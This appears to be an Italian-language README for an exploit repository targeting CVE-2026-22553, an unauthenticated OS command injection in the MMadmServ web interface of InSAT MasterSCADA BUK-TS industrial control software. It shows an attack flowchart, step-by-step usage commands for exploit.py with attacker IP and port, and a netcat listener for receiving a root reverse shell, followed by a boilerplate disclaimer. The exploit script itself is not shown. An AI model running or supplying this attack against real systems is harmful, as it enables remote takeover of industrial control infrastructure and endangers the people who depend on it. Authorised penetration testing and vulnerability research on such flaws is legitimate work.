
Exploit di iniezione di comandi del sistema operativo non autenticato per l'interfaccia web InSAT MasterSCADA BUK-TS MMadmServ. Fornisce una reverse shell con privilegi di root tramite richiesta HTTP POST. CVSS 9.8 critico.
CVE-2026-22553 | CVSS 9.8 Critico | Autore dell'exploit: Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS soffre di una vulnerabilità di OS Command Injection non autenticata nell'interfaccia web MMadmServ. Questa falla consente a un attaccante remoto di ottenere la piena esecuzione di codice in remoto (RCE) senza alcuna autenticazione.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fffpython3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Opzione | Descrizione |
|---|---|
target | URL di destinazione (es. http://ip:port) |
--lhost | Il tuo indirizzo IP (reverse shell) |
--lport | La tua porta in ascolto |
Avvia un listener sulla tua macchina:
nc -lvnp 4444
Esegui l'exploit:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Ottieni una reverse shell con privilegi root/sistema.
Questo exploit è fornito esclusivamente per scopi educativi e di test di penetrazione autorizzati.
L'uso non autorizzato contro sistemi che non possiedi è illegale e potrebbe violare leggi internazionali.
L'autore non è responsabile per qualsiasi uso improprio.
Mohammed Idrees Banyamer
Assegna una stella ⭐ a questo repository se lo trovi utile!